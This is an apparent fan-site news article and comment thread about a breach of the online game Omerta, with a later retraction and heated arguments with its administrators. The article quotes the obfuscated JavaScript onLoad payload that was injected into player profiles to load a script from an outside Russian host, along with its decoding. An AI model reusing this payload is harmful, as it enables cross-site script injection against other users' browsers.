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22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4906d 18h 33m 20s ago by LL
Comments: 164
Views: 71,209
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Version: 3.2
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.

In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.

Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)

They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)

Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.

This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.

We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.


Just as more proofs, the hackers has released a list of 515 users with their set testament.

Also they released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.


One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.

Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.

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Butcheta (09:34:24 - 13-10)
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Omerta was and will always be hacked from time to time. Period
Anonymous (15:33:06 - 03-10)
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ReBorN at 04:55:43 on 03/10:

Even if they never answer questions about the hack again all they have to say is: ob already admitted they were wrong, so we are vindicated.

Well that part is easy, annoy the shit out of em.
Every fucking facebook status from brando; Hack discussion time.
Every single newspost that allows comments: Hack discussion time.
Any spare time? Go to help and ask for Hack discussion.
Sooner or later they will have to bow and explain, since while most people here know about it by now are generally the more advanced, higher ranked more experienced players.
Random retard with his moms creditcard has no idea the hack ever took place, or what OB is.
And those players will prolly want the same thing, information, because with all the PSN hacks etc ignorant people are scared shitless.

He's complaining right now how hard he has it testing Lackeys V2, we didnt even want fucking V1.
So a complaining dev crying about stuff the vast majority didnt even care for and no response, at all, ontopic about these hacks. Its pathetic really.
lunatiko Portugal (08:39:00 - 03-10)
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ReBorN at 04:55:43 on 03/10:
Rix, I think you guys are missing the point. The reason everyone here thinks you guys are bowing to the admins is because your rectification is far reaching and makes it look like you apologized for everything. Brando immediately posted it up on Facebook as evidence that they were vindicated. Omerta got their vindication without even publicly acknowledging that they were hacked.

They feverishly tried to get you to retract the story. Your biggest weapon to get them to admit they were hacked was the rectification. They got what they wanted all the while not getting what we needed to hear as players. In my opinion, that's where this fails and makes it look like you guys bowed to them.

You had the upper hand and lost it. When I first read the rectification it appeared like you apologized for everything all the while the admins took responsibility for absolutely nothing. At the very least it should have been worded better and stated that although you stood firm on the fact that omerta got hacked you were wrong on assuming the two instances were related. The admins have no reason to address the hack now since they got what they wanted.

Even if they never answer questions about the hack again all they have to say is: ob already admitted they were wrong, so we are vindicated. By admitting you were wrong once you give the impression you could be wrong about other instances.

I'm sorry if you don't agree but I think you'll find alot of people feel the same way I do. You guys played this one all wrong and even though you have the higher moral ground and all the proof on your side, the admins still win.

Just my $0.02
couldn't have said it better !

Reborn :^
ReBorN United States (04:55:43 - 03-10)
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Rix, I think you guys are missing the point. The reason everyone here thinks you guys are bowing to the admins is because your rectification is far reaching and makes it look like you apologized for everything. Brando immediately posted it up on Facebook as evidence that they were vindicated. Omerta got their vindication without even publicly acknowledging that they were hacked.

They feverishly tried to get you to retract the story. Your biggest weapon to get them to admit they were hacked was the rectification. They got what they wanted all the while not getting what we needed to hear as players. In my opinion, that's where this fails and makes it look like you guys bowed to them.

You had the upper hand and lost it. When I first read the rectification it appeared like you apologized for everything all the while the admins took responsibility for absolutely nothing. At the very least it should have been worded better and stated that although you stood firm on the fact that omerta got hacked you were wrong on assuming the two instances were related. The admins have no reason to address the hack now since they got what they wanted.

Even if they never answer questions about the hack again all they have to say is: ob already admitted they were wrong, so we are vindicated. By admitting you were wrong once you give the impression you could be wrong about other instances.

I'm sorry if you don't agree but I think you'll find alot of people feel the same way I do. You guys played this one all wrong and even though you have the higher moral ground and all the proof on your side, the admins still win.

Just my $0.02
LL on phone (15:58:49 - 01-10)
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I see a bunch of comments here about the rectification being posted just to get our Omerta accounts back or get the bans removed, but It's not about that at all. if the Omerta office decides to ban our links etc for good, we're at a greater loss than our internet dignity we supposedly lost here. If you're wrong you should be able to admit it. as we have done. it. was wrong of us to put the events as a collective. but was it not wrong of Omerta to deny that any information was taken from their servers? or that once the testaments got out, claim that that had been the only material compromised?

I think both Omerta and OB could have handled the situation better but at no point in time did we have any support for the admins side of the story, whereas the hackers had a whole lot to support their claims. We did not intentionally post false information just for a couple of more views or comments. we tried to inform the community with the given information of which we had no reason to believe it wasn't true. I still don't believe that any of the proof is fabricated.
Brando seems to think we're on a crusade to destroy their reputation and the game, but apart from maybe a day of fun comments on this site, we'd be at a loss.
without Omerta there's no use for this site. and without us all the players have will be trabot news. And that's not a good thing either.
So we have to coexist.

Just a personal note to brando, I don't know how they do stuff in China. but the way you sometimes talk to people you're in disagreement with is really counter productive. yes your personal interests might be at stake, but talking like you're superior, calling names right away, and then screaming fire and murder the moment someone doesn't treat you with royal respect might make people want to work against you rather than come to a solution.
for example, in the news it is stated in a way that we intentionally fabricated the whole story. we didn't, we drew conclusions based on misinformation. but we're put up there as we are downright evil pigs bent on destruction of Omerta ltd.

did I at any point call you names? or used the word for intercourse as an adjective in any sentence? no. cause it would work against me. the only luck that you have is a whole lot of places to ban us from.

is talking like that really necessary then?
lunatiko Portugal (14:52:29 - 01-10)
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Rix at 11:57:56 on 01/10:
lunatiko at 10:12:03 on 01/10:
Sad to see how you all bonded and licked brando's ass !! Just for what? not being glined and akilled?

anyway really sad to see..gl with beyond..

I miss zenga! xD
This rectification was justly, we indeed made an assumption without proof and we rectified this. Nothing more, nothing less. You're free to have your opinion about that, but this situation changes nothing about the fact that Omerta has been hacked and the crew is still denying it.

By the way, Sbanks was already mailing with Brando when we got glined and frozen, which makes it even stranger.

Ofc you should update, and tell what things were wrong..but still the way you did it..
it's like you are bending over him

but anyway..not my business :P
Rix Netherlands (11:57:56 - 01-10)
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lunatiko at 10:12:03 on 01/10:
Sad to see how you all bonded and licked brando's ass !! Just for what? not being glined and akilled?

anyway really sad to see..gl with beyond..

I miss zenga! xD
This rectification was justly, we indeed made an assumption without proof and we rectified this. Nothing more, nothing less. You're free to have your opinion about that, but this situation changes nothing about the fact that Omerta has been hacked and the crew is still denying it.

By the way, Sbanks was already mailing with Brando when we got glined and frozen, which makes it even stranger.
lunatiko Portugal (10:12:03 - 01-10)
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Sad to see how you all bonded and licked brando's ass !! Just for what? not being glined and akilled?

Who cares about some errors in your update? At least we had an update..cause from omerta crew we just had one a week later!

This means you had to push the button so that admins talked about it?
Brando could answer in any comment/update..and he is surely free to talk about this with you to get you a better view of what happened. He had quite some days to do it..and what he did ? he akilled and glined people that talked in a site not related to omerta?

his words in some comments were really nice to beyond crew:)
or even to regular members that read it..

I wonder what did he promise more..
to get you to this lame 'excuse'

anyway really sad to see..gl with beyond..

I miss zenga! xD
Anonymous (08:58:04 - 01-10)
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Rix at 08:42:24 on 01/10:
Since the convo was going on here I thought it was best to lock it so it stays in one place, so feel free to comment on it here (which you do now of course).

My gline is gone since two hours by the way.

xD ok fair enough then i guess but they are two different subjects in my opinion :P

grats on the gline gone :') whilst you never should have had it lol
Rix Netherlands (08:42:24 - 01-10)
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Since the convo was going on here I thought it was best to lock it so it stays in one place, so feel free to comment on it here (which you do now of course).

My gline is gone since two hours by the way.
Anonymous (05:56:05 - 01-10)
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This article has been locked, no further comments are possible

hmmm a whiff of omerta crew style topic there lol

what happen to freedom of speech Rix ? xD

you know this its so unfair and bullshit aswell as the next guy
omerta thinks now they "won" and that OB just post"lies" but thing is omerta WAS HACKED!!!

where is the post about omerta's retification ? xD
to me and in my views
this apology is all caused because you guys want to play the game and need bots and such for your logs to keep your site going correct ....... so you do this post to bhe sure you get un-glined and unfrozen and shit

and i hope omerta players can see the way omerta "abuses" there power of admin and crew to pull there weight even in a free to speak your mind site :) ....

omerta must do something right i geuss... if they can even change free to speach site to blocked..... and make people try to believe there bullshit side :D where is the post on omerta lol they deep down know they are wrong or what ? :/ (about the hack)
noone gives a shit you have made a mistake on the possible whereabouts of the intrusion we care that omerta was hacked and still to this minute Brando and crew are in denial it was hacked....
where does the game go from lies about hacks from crew ?
Rix Netherlands (23:43:09 - 30-09)
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sensje at 22:48:21 on 30/09:
(G-lined already gone?)
Nope. They would remove all bans if and when we would rectify (again I want to stress that even though some sort of "deal" was made here, we would never have rectified if we weren't agreeing on it) and they did remove some glines, but Sbanks and me are still glined and I'm also still akilled. They did open #beyond again, and I can't test if they are still blocking our links... since I'm glined. Also my bot (NoobSurv) has been down for 24 hours and I can't get him to boot no matter what, but that's probably just coincidence.

I have mailed Brando, Bramblerose, Teckna and "irc" about the glines and Kyra has contacted Teckna on irc, but no response what so ever.
Anonymous at 23:10:16 on 30/09:
The successor link only got posted in the comments and never made it in the actual article.
Actually you are wrong there, we did link to that list in an update.
Anonymous (23:10:16 - 30-09)
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The testament link was posted here in the comments, and altho obn crew added said link to this article a few hours after it got posted they didnt really release it themselves.
The successor link only got posted in the comments and never made it in the actual article.
They didnt leak either links, they just chose to not delete em.
And why would they, this site has around 40 people hovering over it at all times, even a link posted for a few minutes will be noticed and spread amongst irc within seconds, removing such link will only increase the amount of attention it will receive on other platforms.
sensje Netherlands (22:48:21 - 30-09)
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Journalisme is all about telling what you have seen, noticed or finding an issue that have to be told to the majority. imo nothing wrong aslong the journalist don't pick sides, Omerta hacked or not hacked.

There are just 2 things about the whole issue that makes me wonder:
1: the list of the hacker(s) and making that list public;
2: a rectifaction, after speaking to Brando.

1: as soon you had the list from the hacker(s), you had a few options but publiced it.
imo that information was your playcard and should have been hidden from publicity or adjusted names before making it public.

(i haven't saw that list so maybe im a complete nut by typing this).

2: after 7 days Brando finally had time to talk to you? (G-lined already gone?) and then you had to write a rectification.
imo that rectification looks like its writen by order of Brando. To me it looks like Omerta (Brando) still use the power to silence people instead of saying thanks and we will digg further in our system.

Less me to finish this with the hope you as OB keep on going and stay objective unless your 100% sure. cause that's why we have the voice, the freedom to speak, act or write.

Have faith :)

Rix Netherlands (15:29:10 - 30-09)
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ReBorN at 15:02:12 on 30/09:
Rix at 14:33:10 on 30/09:
ReBorN at 13:52:50 on 30/09:
I just want to make sure I have this straight Rix ...

You guys are specifically apologizing for assuming the hack caused the downtime and releasing the hacked information on this site? Nothing else, correct?

And if my above assumption is correct, then Brando didnt challenge or didnt address the possible hack that may have occurred?

So it is still confirmed that a hack took place that the admins are still denying? I dont think anyone here gave a flying fuck if they hack caused the downtime, they only care that the DB was accessed in the first place! Admins have denied time and time again that no one accessed the DB. Are the lists authentic (as they do appear to be)? Did you have a chance to ask Brando about the supposed hack that didnt occur?

This is the exact reason why I havent donated a dime to this game in over a year, the contempt many admins have towards the player base, the attitude that we are nothing more then sheep.
Yup that's all correct. We weren't able to ask him about it, I'm still waiting until they remove my gline (which they would do 5 hours ago) and we will probably have an interview with Brando hopefully somewhere next week or so.
Lol, looooooooooong after the actual incident so everyone calms down and starts to forget. Brando plays this game well it seems.

If you guys were obviously wrong in an assumption you made (you know what happens when you assume right? You make an ASS out of U and ME :p) then your right to rectify the situation. But if I were in your shoes, I would have refused to post an apology until getting clarification on the main issue which was the hack.

Now Omerta got what they want, an apology from OB crew. Doesnt matter what the totality of the apology consists of, doesnt matter its not an apology about the hack, it was an apology none-the-less .. now Omerta wins cause OB said they were wrong ... about something. :p

Nothing more then a public relations/damage control game to Omerta admins/Brando.
We obviously see it different. We see it as a weak sign from the crew to start about that at us while meanwhile no one gives a shit about that (as becomes clear in the comments here as well after we put that rectification up). Don't worry, we haven't forgot what is going on.
ReBorN United States (15:02:12 - 30-09)
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Rix at 14:33:10 on 30/09:
ReBorN at 13:52:50 on 30/09:
I just want to make sure I have this straight Rix ...

You guys are specifically apologizing for assuming the hack caused the downtime and releasing the hacked information on this site? Nothing else, correct?

And if my above assumption is correct, then Brando didnt challenge or didnt address the possible hack that may have occurred?

So it is still confirmed that a hack took place that the admins are still denying? I dont think anyone here gave a flying fuck if they hack caused the downtime, they only care that the DB was accessed in the first place! Admins have denied time and time again that no one accessed the DB. Are the lists authentic (as they do appear to be)? Did you have a chance to ask Brando about the supposed hack that didnt occur?

This is the exact reason why I havent donated a dime to this game in over a year, the contempt many admins have towards the player base, the attitude that we are nothing more then sheep.
Yup that's all correct. We weren't able to ask him about it, I'm still waiting until they remove my gline (which they would do 5 hours ago) and we will probably have an interview with Brando hopefully somewhere next week or so.
Lol, looooooooooong after the actual incident so everyone calms down and starts to forget. Brando plays this game well it seems.

If you guys were obviously wrong in an assumption you made (you know what happens when you assume right? You make an ASS out of U and ME :p) then your right to rectify the situation. But if I were in your shoes, I would have refused to post an apology until getting clarification on the main issue which was the hack.

Now Omerta got what they want, an apology from OB crew. Doesnt matter what the totality of the apology consists of, doesnt matter its not an apology about the hack, it was an apology none-the-less .. now Omerta wins cause OB said they were wrong ... about something. :p

Nothing more then a public relations/damage control game to Omerta admins/Brando.
Rix Netherlands (14:33:10 - 30-09)
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ReBorN at 13:52:50 on 30/09:
I just want to make sure I have this straight Rix ...

You guys are specifically apologizing for assuming the hack caused the downtime and releasing the hacked information on this site? Nothing else, correct?

And if my above assumption is correct, then Brando didnt challenge or didnt address the possible hack that may have occurred?

So it is still confirmed that a hack took place that the admins are still denying? I dont think anyone here gave a flying fuck if they hack caused the downtime, they only care that the DB was accessed in the first place! Admins have denied time and time again that no one accessed the DB. Are the lists authentic (as they do appear to be)? Did you have a chance to ask Brando about the supposed hack that didnt occur?

This is the exact reason why I havent donated a dime to this game in over a year, the contempt many admins have towards the player base, the attitude that we are nothing more then sheep.
Yup that's all correct. We weren't able to ask him about it, I'm still waiting until they remove my gline (which they would do 5 hours ago) and we will probably have an interview with Brando hopefully somewhere next week or so.
Anonymous (14:09:44 - 30-09)
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Do you really think that ignoring the issue will make it go away. For too long this has been Omerta crew policy - led by you.

WE DESERVE BETTER!!! This isn't just a money hack anymore limited to ing data, this is personal data also :|

How dare you decide not to tell us the truth and also the consequences of such security breach. get your act together.

If you want to make us pay to play (lets make no mistake, you have) then you better start treating your player base/CUSTOMERS with more respect.

We are not asking for much... just truth, not only our ing account information but personal details too are at risk. How would you like it if some of your details that you didnt want put out in the open were??? You think about that :)
ReBorN United States (13:52:50 - 30-09)
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I just want to make sure I have this straight Rix ...

You guys are specifically apologizing for assuming the hack caused the downtime and releasing the hacked information on this site? Nothing else, correct?

And if my above assumption is correct, then Brando didnt challenge or didnt address the possible hack that may have occurred?

So it is still confirmed that a hack took place that the admins are still denying? I dont think anyone here gave a flying fuck if they hack caused the downtime, they only care that the DB was accessed in the first place! Admins have denied time and time again that no one accessed the DB. Are the lists authentic (as they do appear to be)? Did you have a chance to ask Brando about the supposed hack that didnt occur?

This is the exact reason why I havent donated a dime to this game in over a year, the contempt many admins have towards the player base, the attitude that we are nothing more then sheep.
Rix Netherlands (12:37:39 - 30-09)
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Anonymous at 11:30:48 on 30/09:
Brando - rly at 09:53:06 on 30/09:
Anonymous at 09:16:19 on 30/09:
Ok so..this latest update means the downtime was not connected to the hack.

Omerta was hacked.

Brando is claiming victory on Facebook now..what a ****.

Victory? If you think that OB was opposed to us in this sorry tale you are wrong - they were just used by the hackers for some free PR.

And as for you calling me names - at least I don;t hide behind an anonymous moniker like you, you ********, ********** *******.

I'll come back here again in a few months. Like I said below, cynics, the story was *a pack of lies*

And the 'journalism' - judge the quality for yourself.

You still haven't even fucking responded about the hacks.
Omerta got hacked, both the testament and successor lists proved so.
The only thing that got retracted by obn is the link between those hacks and the downtime, which is still a whole lot better then 'well some retard dev put some changes in that trigged some sort of ultra super security system made by some sysadmin which caused 2 full days of 50x errors, woops!' but ok, that's possible.
You still got hacked, you still denied that.
The successor link only got published because you decided 'im gonna bann em for not responding to my email during my working day eventho i live in fucking China thus time-zones are completely off' with Rix posting here multiple times that he had infact responded already.

And still, you got hacked, at least twice since the hackers this story was based around and the ones that published the lists are 2 entirely different groups and still no word about that.
Obn might have been the source for these lists, its still your data thats in them, you know, the data that has been hacked but you still claim didnt happen.

Let me summarize:
Omerta gets hacked.
Obn posts about these hacks, and makes a (prolly correct) connection between the hacks and sudden downtime.
You get your panties in a bunch about it and decide to g-line, freeze and akill Obn accounts since they dont instantly agree with you about a retraction.
Bramble suddenly comes up with a bs story about a source for the then already released testament list, claiming all and everyone on it are in immortal mode for 48 hours, which if comments about that are correct wasn't even true.
Hackers get pissed about you taking a stand against Obn and release another, far more valued list this time containing every successor and subsuccesor.
Just to prove the hack took place, the actual data was a few weeks old but still a lot of fams confirmed the list to be accurate, even after some time has gone by.
And now you get Obn to retract about the hack-downtime link and your holding a victory parade about justice and you standing up for your colleagues.

You still haven't responded about the actual hacks, the subject or even remotely responded ontopic. And its been more then a week that this article has been published, and yet, nothing.
How can you be happy about your 'justice'?
Fucking respond ontopic for once.
And not here in a comment, no, an actual newspost to explain what happened, what the consequences are for players affected by it and more importantly if you did anything to make sure it doesn't happen again. Since all this denial kinda worries me you didnt even fix it, since there was nothing to fix right? Be the boss you claim to be for once, DG would have posted about this a week ago, since he seemed to understand what mattered to people playing your game.
Perfect summary.

By the way, I wished they removed Sbanks' and my gline already so I can attempt to get my bot back online. It's been almost 4 hours already.